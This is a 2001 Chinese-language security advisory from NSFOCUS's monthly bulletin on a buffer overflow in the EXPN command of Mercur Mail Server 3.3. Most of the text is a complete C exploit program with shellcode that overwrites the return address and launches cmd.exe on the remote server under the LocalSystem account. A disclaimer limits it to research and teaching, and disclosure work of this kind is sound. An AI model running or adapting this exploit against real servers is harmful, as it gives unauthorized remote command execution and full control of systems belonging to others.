首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第19期->最新漏洞
日期:2001-02-19
受影响的系统:
Atrium Software Mercur Mail Server 3.3
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 2000 Server
- Microsoft Windows NT 2000 Professional
- Microsoft Windows NT 2000
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 2412
Atrium Software Mercur Mail Server 3.3(http://www.atrium-software.com/)的
EXPN命令存在缓冲区溢出,可以使其拒绝服务或者执行任意命令。
如果远程攻击者telnet到SMTP server端口,在EXPN命令后面输入超长的随机字符串,则目
标机器会崩溃。如果精心地构造字符串写入到缓冲区中以覆盖EIP,就可能执行任意命令。攻
击者可以在LocalSystem帐号的上下文中对远程系统采取几乎任何行动。
<* 来源:Martin Rakhmanoff (martin@direct.spb.ru) *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的程序将在远程机器上执行cmd.exe(MCRSMTP.EXE的版本是3.30.3.0):
/*
MERCUR Mailserver 3.3 Remote Buffer Overflow
Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
Martin Rakhmanoff
martin@direct.spb.ru
*/
#include <winsock2.h>
#include <stdio.h>
/* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
char shellcode[] =
"\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77
\xFF\xD0\x33\xDB\x53"
"\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64
\x2E\x65\x78\x65\x0D\x0A";
/*
In SoftICE bpx 001b:00418b65 - here eip is restored
with overwritten
value...
*/
int main(int argc, char * argv[]){
int i;
char sploit[512];
char buffer[512];
WSADATA wsaData;
SOCKET sock;
struct sockaddr_in server;
struct hostent *hp;
WSAStartup(0x202,&wsaData);
hp = gethostbyname("arena");
memset(&server,0,sizeof(server));
memcpy(&(server.sin_addr),hp->h_addr,hp->h_length);
server.sin_family = hp->h_addrtype;
server.sin_port = htons(25);
sock = socket(AF_INET,SOCK_STREAM,0);
connect(sock,(struct sockaddr*)&server,sizeof
(server));
sploit[0]='E';
sploit[1]='X';
sploit[2]='P';
sploit[3]='N';
sploit[4]=0x20;
for(i=5;i<137;i++){
sploit[i]=0x41;
}
// Return address
//77E87D8B
sploit[137]=0x8B;
sploit[138]=0x89;
sploit[139]=0xE8;
sploit[140]=0x77;
for(i=0;i<sizeof(shellcode);i++){
sploit[i+141]=shellcode[i];
}
recv(sock,buffer,512,0);
send(sock,sploit,173,0);
closesocket(sock);
WSACleanup();
return 0;
}
--------------------------------------------------------------------------------
建议:
临时解决办法:
NSFOCUS建议您换用别的替代产品。
厂商补丁:
暂无
版权所有,未经许可,不得转载